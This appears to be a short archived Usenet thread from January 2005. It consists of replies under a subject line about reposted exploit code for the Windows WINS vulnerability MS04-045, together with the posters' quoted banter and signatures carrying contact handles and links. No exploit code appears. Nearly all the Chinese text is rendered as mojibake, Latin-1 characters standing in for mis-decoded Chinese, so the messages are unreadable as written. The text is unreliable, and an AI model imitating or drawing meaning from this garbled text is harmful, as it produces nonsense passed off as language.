ÖÐ¹úfansµÄÐÂÎÅ×é£¬ÖÐ¹úfansµÄ¼Ò......

From:	·çÖÐÖ½Ò³
Subject:	Re: Re: ¡¾×¢Òâ¡¿Â©¶´¹«¸æ£ºWINS MS04-045 Exploit Code--×ªÌù
Date:	Sun, 23 Jan 2005 21:03:44 +0800

ÆäÊµ²î²»¶à¡£¡£¡£¡£
ÔÚÉÏÒ»»ØÖÐ£¬ÅÖÅÖµÄÁ÷ÐÇ99 ÕÅ×Å´ó×ìËµµ½:

:ÎÒµ¹£¬Õâ¸ö±È·½ÊµÔÚÊÇ.......
:
:ÔÚ Mon, 17 Jan 2005 13:15:51 +0800 Ê±, ·çÖÐÖ½Ò³ Ð´ÁË:

·çÖÐÖ½Ò³(½ñÌìÄã[ÔÎ]ÁËÃ´£¿)

QQ: 29024977(Çë×¢Ã÷Éí·Ý)
MSN: guoyun01(at)hotmail(dot)com
»¶Ó·ÃÎÊnews://news.yaako.comºÍÈ«ÊÀ½ç½»Á÷
Blog: http://fzhzhy.3322.org

°ÑÎÊÌâÏÈ½»¸øgoogle£¬È»ºóÔÙÎÊÅóÓÑ¡£¡£¡£¡£

From:	Á÷ÐÇ99
Subject:	Re: ¡¾×¢Òâ¡¿Â©¶´¹«¸æ£ºWINS MS04-045 Exploit Code--×ªÌù
Date:	Sun, 23 Jan 2005 23:30:14 +0800

ÔÎ£¬Õâ¸öÊôÓÚÉÙ¶ù²»ÒË^_^

ÔÚ Sun, 23 Jan 2005 21:03:44 +0800 Ê±, ·çÖÐÖ½Ò³ Ð´ÁË:
--

>ÆäÊµ²î²»¶à¡£¡£¡£¡£
>ÔÚÉÏÒ»»ØÖÐ£¬ÅÖÅÖµÄÁ÷ÐÇ99 ÕÅ×Å´ó×ìËµµ½:
>
>
>:ÎÒµ¹£¬Õâ¸ö±È·½ÊµÔÚÊÇ.......
>:
>:ÔÚ Mon, 17 Jan 2005 13:15:51 +0800 Ê±, ·çÖÐÖ½Ò³ Ð´ÁË:
>
>·çÖÐÖ½Ò³(½ñÌìÄã[ÔÎ]ÁËÃ´£¿)

ÎÒÊÇÁ÷ÐÇ£¬ËäÈ»Ò»ÉÁ¶ø¹ý£¬
Ò²Ï£ÍûÄÜÁôÏÂÃÀÀöµÄ¹âÃ¢¡£
»¶Ó¹âÁÙ news://news.cn99.com/cn.fan
ÖÐ¹úfansµÄÐÂÎÅ×é£¬ÖÐ¹úfansµÄ¼Ò......

From:	·çÖÐÖ½Ò³
Subject:	Re: Re: ¡¾×¢Òâ¡¿Â©¶´¹«¸æ£ºWINS MS04-045 Exploit Code--×ªÌù
Date:	Sun, 23 Jan 2005 23:48:54 +0800

ÏÖÔÚµÄÉÙ¶ù£¿£¿£¿£¿

ÄãÃ»ÓÐ¿´µ½NewBlueÌìÌì³³×ÅÒªKanÈËÃ´£¿¹þ¹þ¡£
ÔÚÉÏÒ»»ØÖÐ£¬ÅÖÅÖµÄÁ÷ÐÇ99 ÕÅ×Å´ó×ìËµµ½:

:ÔÎ£¬Õâ¸öÊôÓÚÉÙ¶ù²»ÒË^_^
:
:ÔÚ Sun, 23 Jan 2005 21:03:44 +0800 Ê±, ·çÖÐÖ½Ò³ Ð´ÁË:

·çÖÐÖ½Ò³(½ñÌìÄã[ÔÎ]ÁËÃ´£¿)

QQ: 29024977(Çë×¢Ã÷Éí·Ý)
MSN: guoyun01(at)hotmail(dot)com
»¶Ó·ÃÎÊnews://news.yaako.comºÍÈ«ÊÀ½ç½»Á÷
Blog: http://fzhzhy.3322.org

°ÑÎÊÌâÏÈ½»¸øgoogle£¬È»ºóÔÙÎÊÅóÓÑ¡£¡£¡£¡£